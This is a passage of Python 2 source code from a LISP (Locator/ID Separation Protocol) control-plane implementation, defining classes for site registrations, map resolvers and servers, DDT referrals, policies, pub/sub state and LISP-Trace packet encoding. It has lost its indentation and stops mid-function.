class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special-case details on
# longest-match lookups for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no
# longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If this is a pull-based decent DNS suffix, create another lisp_mr()
# for each A-record. Only the master (A-record index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no
# longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If this is a pull-based decent DNS suffix, create another lisp_ms()
# for each A-record. Only the master (A-record index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" or month > "12"): return(False)
if (day < "01" or day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" or hour > "23"): return(False)
if (mi < "00" or mi > "59"): return(False)
if (sec < "00" or sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
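#
# Usage sketch (hypothetical values): lisp_datetime("2015-12-31-23:59:59")
# stores the integer 20151231235959, so instances compare in
# chronological order. A policy match clause calls
# datetime_lower.now_in_range(datetime_upper) to test whether the
# current time falls between its two bounds.
#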
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#enddef
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
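#
# Illustrative usage sketch (field values hypothetical). encode()/decode()
# round-trip the 4-byte type/port word, the 4-byte local RLOC, the 8-byte
# nonce, and a trailing JSON array:
#
#   lt = lisp_trace()
#   lt.packet_json = [{"node" : "ITR", "srloc" : "10.0.0.1"}]
#   packet = lt.encode()
#   rx = lisp_trace()
#   if (rx.decode(packet)): rx.print_trace()
#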
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
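# Illustrative call forms (arguments hypothetical):
#
#   lisp_get_map_resolver(addr, None)   # exact match on Map-Resolver address
#   lisp_get_map_resolver(None, "")     # any Map-Resolver, first one found
#   lisp_get_map_resolver(None, None)   # least-recently-used MR with
#                                       # mr-name "all"
#   lisp_get_map_resolver(None, eid)    # least-recently-used MR from the
#                                       # mr-name set of the EID's
#                                       # database-mapping
#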
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
